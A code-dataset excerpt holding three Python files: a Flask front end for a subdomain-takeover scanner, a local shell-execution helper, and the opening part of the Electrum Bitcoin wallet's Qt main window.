source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
app.py
|
#!/usr/bin/pyton
# encoding: utf-8
from flask import Flask
from flask import render_template, redirect, url_for, request
from threading import Thread
import subprocess,os
# Initialise the flask application
app = Flask(__name__)
# Index route
@app.route("/", methods=['GET','POST'])
def index():
if request.method == 'POST':
if "scan" in request.form:
# Threaded mass scan
run_mass_scan()
return redirect(url_for('massscan'))
if "domain" in request.form:
# Threaded single scan
domain = request.form.get('domain')
run_single_scan(domain)
return redirect(url_for('singlescan', domain=domain))
return render_template('home.html')
# Do a mass scan on all subdomain
def run_mass_scan():
thr = Thread(target=run_async_mass_scan, args=[])
thr.start()
return thr
# Run a mass async scan
def run_async_mass_scan():
process = subprocess.Popen(['bash', 'subauto.sh', '&>/dev/null', '&'])
process.communicate()
# Do a single scan
def run_single_scan(domain):
thr = Thread(target=run_async_single_scan, args=[domain])
thr.start()
return thr
# Run a single async scan
def run_async_single_scan(domain):
process = subprocess.Popen(['bash', 'single.sh', domain, '&>/dev/null', '&'])
process.communicate()
# Start the scan.
@app.route('/mass-scan')
def massscan():
try:
if os.path.isfile('domains.txt'):
if os.path.isfile("done.txt"):
return redirect(url_for('results'))
if os.path.isfile("takeovers"):
return redirect(url_for('results'))
else:
f=open('domains.txt','r+', encoding="utf-8")
content=f.readlines()
return render_template('scan.html', len = len(content), domain="")
else:
return render_template('scan.html', len = 0, domain="")
except TypeError:
return render_template('scan.html', len = 0, domain="")
# Start the single scan.
@app.route('/single-scan/<domain>')
def singlescan(domain):
try:
if os.path.isfile('domains.txt'):
if os.path.isfile("done.txt"):
return redirect(url_for('results'))
if os.path.isfile("takeovers"):
return redirect(url_for('results'))
else:
f=open('domains.txt','r+', encoding="utf-8")
content=f.readlines()
return render_template('scan.html', len = len(content), domain=domain)
else:
return render_template('scan.html', len = 0, domain=domain)
except TypeError:
return render_template('scan.html', len = 0, domain=domain)
# Display the results
@app.route('/results')
def results ():
# Check to see if the session is mine
if os.path.isfile("takeovers"):
if os.path.isfile("links"):
f1=open('takeovers', 'r')
content=f1.readlines()
f3=open('links', 'r')
links=f3.readlines()
return render_template('results.html', len = len(content), domains=len(content), content=content, links=links)
else:
return render_template('results.html', len = 0, domains=0, content="Still Proccessing...", links="")
else:
return render_template('results.html', len = 0, domains=0, content="No Subdomain Takeovers Found", links="")
# Run the application
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=False, port=5444)
|
localshell.py
|
from subprocess import Popen, PIPE
from .abstractshell import AbstractShell
from .shellresult import ShellResult
from .streamreader import StandardStreamReader
from .queue import Queue
from threading import Thread
from shutil import copyfile
from os import chmod, stat, environ
class LocalShell(AbstractShell):
def __init__(self, *args, **kwargs):
AbstractShell.__init__(self, *args, **kwargs)
self.update(environ)
def execute_command(self, command, env={}, wait=True, check_err=False, cwd=None):
process = Popen(command, env=env, shell=True, stdout=PIPE, stderr=PIPE, cwd=cwd)
queue = Queue()
StandardStreamReader(process.stdout, 1, queue)
StandardStreamReader(process.stderr, 2, queue)
def post_process_exit_code():
queue.put( (0, process.wait()) )
queue.put( (0, None) )
Thread(target=post_process_exit_code).start()
return ShellResult(self, command, queue, wait, check_err)
def do_pull(self, local_path, remote_path):
copyfile(remote_path, local_path)
def do_push(self, local_path, remote_path):
copyfile(local_path, remote_path)
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton)
import electrum
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException, BITCOIN_BIP21_URI_SCHEME)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName, BlockingWaitingDialog)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QToolButton):
# note: this class has a custom stylesheet applied in stylesheet_patcher.py
def __init__(self, icon, tooltip, func):
QToolButton.__init__(self)
self.setText('')
self.setIcon(icon)
self.setToolTip(tooltip)
self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.setAutoRaise(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [ Qt.Key_Return, Qt.Key_Enter ]:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
if wallet.has_lightning():
self.wallet.config.set_key('show_channels_tab', True)
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
self.pending_invoice = None
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
try:
new_path = self.wallet.save_backup()
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
if new_path:
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
else:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
tools_menu.addAction(_("&Lightning Network"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network))
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
